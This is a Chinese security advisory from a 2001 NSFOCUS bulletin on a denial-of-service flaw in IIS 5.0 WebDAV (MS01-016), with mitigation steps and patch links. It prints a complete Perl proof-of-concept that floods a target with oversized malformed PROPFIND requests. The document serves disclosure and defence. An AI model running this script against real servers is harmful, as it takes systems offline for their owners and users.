首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第19期->最新漏洞
期刊号: 类型: 关键词:
IIS WebDAV拒绝服务的漏洞

日期:2001-02-19

受影响的系统:  
Microsoft IIS 5.0
   + Microsoft Windows NT 2000

描述:
--------------------------------------------------------------------------------


WebDAV是HTTP协议的扩展,允许从远程来编写和管理Web内容。微软IIS 5.0的WebDAV在
处理某些畸形的请求时存在缺陷,提交多个畸形的WebDAV请求可以使服务器停止响应。

<* 来源:Microsoft Security Bulletin (MS01-016)
         Georgi Guninski security advisory #38, 2001        
*>

测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



Georgi Guninski(guninski@GUNINSKI.COM)提供了下列测试代码:

#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;

print "IIS 5.0 propfind\n";

$port = @ARGV[1];
$host = @ARGV[0];


sub vv()
{

$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow

$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
# ^^^^ This is another issue and also works with length ~>65000


$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}


do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";


--------------------------------------------------------------------------------
建议:

临时解决方法:

微软给出一个禁止WebDAV的临时解决办法(http://www.microsoft.com/technet/support/kb.asp?ID=241520):
1、先停止IIS服务。可以在命令行下敲“IISRESET /STOP”命令。
2、禁止everyone访问Httpext.dll:
  CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone
3、再启动IIS服务:IISRESET /START

厂商补丁:

微软已经为此发布了一个安全公告(MS-016):
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp

补丁程序(目前只有英文版):

Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564


版权所有,未经许可,不得转载
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客